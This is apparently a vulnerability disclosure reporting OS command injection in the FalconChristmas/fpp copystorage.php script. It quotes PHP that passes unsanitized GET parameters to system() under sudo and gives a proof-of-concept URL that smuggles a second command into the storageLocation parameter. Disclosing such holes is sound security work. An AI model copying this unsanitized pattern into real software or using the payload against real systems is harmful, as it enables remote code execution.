OS Command Injection in FalconChristmas/fpp

Valid
Reported on May 12th 2021

✍️ Description

In https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/copystorage.php#L27 you build a command using unsanitized user input :

<?php
    $date = date("Ymd-Hi");
    $path = preg_replace('/{DATE}/', $date, $_GET['path']);

        echo "==================================================================================\n";

    $command = "sudo /opt/fpp/scripts/copy_settings_to_storage.sh " . $_GET['storageLocation'] . " " . $path . " " . $_GET['direction']  . " " . $_GET['delete'] . " " . $_GET['flags'] . " 2>&1"; // no sanitization :(

        echo "Command: $command\n";
        echo "----------------------------------------------------------------------------------\n";
        system($command);
        echo "\n";

?>

I can control the content of storageLocation and direction and delete and flags.

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/copystorage.php?storageLocation=||ls

💥 Impact

Remote Code Execution